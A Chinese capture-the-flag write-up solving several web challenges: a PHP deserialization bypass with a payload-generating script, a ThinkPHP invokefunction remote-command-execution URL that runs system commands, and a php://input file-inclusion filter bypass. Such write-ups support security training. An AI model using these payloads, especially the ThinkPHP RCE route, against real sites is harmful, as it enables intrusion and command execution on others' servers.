攻防世界 Web 安全挑战题解与代码审计实战

二：Web_php_unserialize

这是一道典型的 PHP 反序列化漏洞题目。

代码审计思路

1. 类定义：定义了 Demo 类，私有属性 $file 初始值为 index.php。
2. 魔术方法：
   • __construct：初始化属性。
   • __destruct：程序结束时高亮输出 $this->file 指向的文件。
3. 目标：提示 Flag 在 fl4g.php 中，需将 $file 修改为此路径。
4. 限制条件：
   • __wakeup 方法检查属性值，若不为 index.php 则重置。
   • 正则表达式过滤序列化格式 /[oc]:\d+:/i。

绕过技巧

• 绕过 __wakeup：序列化对象时，属性数量大于实际定义的属性数量。例如将 O:4:"Demo":1: 改为 O:+4:"Demo":2:。
• 绕过正则：利用正则不匹配 + 号，将 O:4 替换为 O:+4。
• 空格问题：注意类名前后可能存在空格，需使用 str_replace 精确替换。

最终 Payload 构造如下：

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

访问参数 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 成功拿到 Flag。

生成 Payload 脚本

<?php 
class Demo { 
    private $file = 'index.php'; 
    public function __construct($file) { 
        $this->file = $file; 
    } 
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    } 
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            $this->file = 'index.php'; 
        } 
    } 
} 
$flag = new Demo('fl4g.php'); 
$flag = serialize($flag); 
$flag = str_replace('O:4', 'O:+4', $flag); 
$flag = str_replace(':1:', ':2:', $flag); 
echo base64_encode($flag);
?> 

三：php_rce

该题目基于 ThinkPHP 框架，存在控制器名过滤不严导致的 RCE 漏洞。

漏洞利用

通过 URL 调用框架内部敏感函数 call_user_func_array 执行系统命令。

1. 查找 Flag 位置：

   /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"
   

2. 读取 Flag 内容：

   /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
   

成功获取 Flag 内容。

四：web_php_include

一道文件包含题目，利用 PHP 伪协议执行代码。

代码审计思路

1. 过滤逻辑：接收 page 参数，使用 strstr 循环检测是否包含 php://。
2. 绕过方法：利用大小写混淆绕过过滤，如 Php://input。
3. 执行命令：配合爆破或特定 Payload 执行系统命令。

构建 Payload：?page=Php://input，成功找到 Flag 文件。

五：总结

1. WEB 2

• 题型特征：基础类题目，考察 HTTP 头信息、简单请求或代码逻辑逆向。
• 解题思路：查看源码、检查响应头、发送特定请求触发返回。

2. Web_php_unserialize

• 题型特征：PHP 反序列化漏洞，涉及魔术方法触发与过滤绕过。
• 解题思路：
  • 修改序列化字符串属性数量绕过 __wakeup。
  • 替换 O:4 为 O:+4 绕过正则过滤。
  • 构造正确 Payload 并 Base64 编码传参。

3. php_rce

• 题型特征：框架漏洞利用，通过路由注入命令。
• 解题思路：构造特定 URL 调用 invokefunction 执行 system 命令。

4. web_php_include

• 题型特征：文件包含漏洞，利用伪协议执行代码。
• 解题思路：
  • 大小写混淆绕过 php:// 过滤。
  • 使用 data:// 或 php://filter 读取源码或执行代码。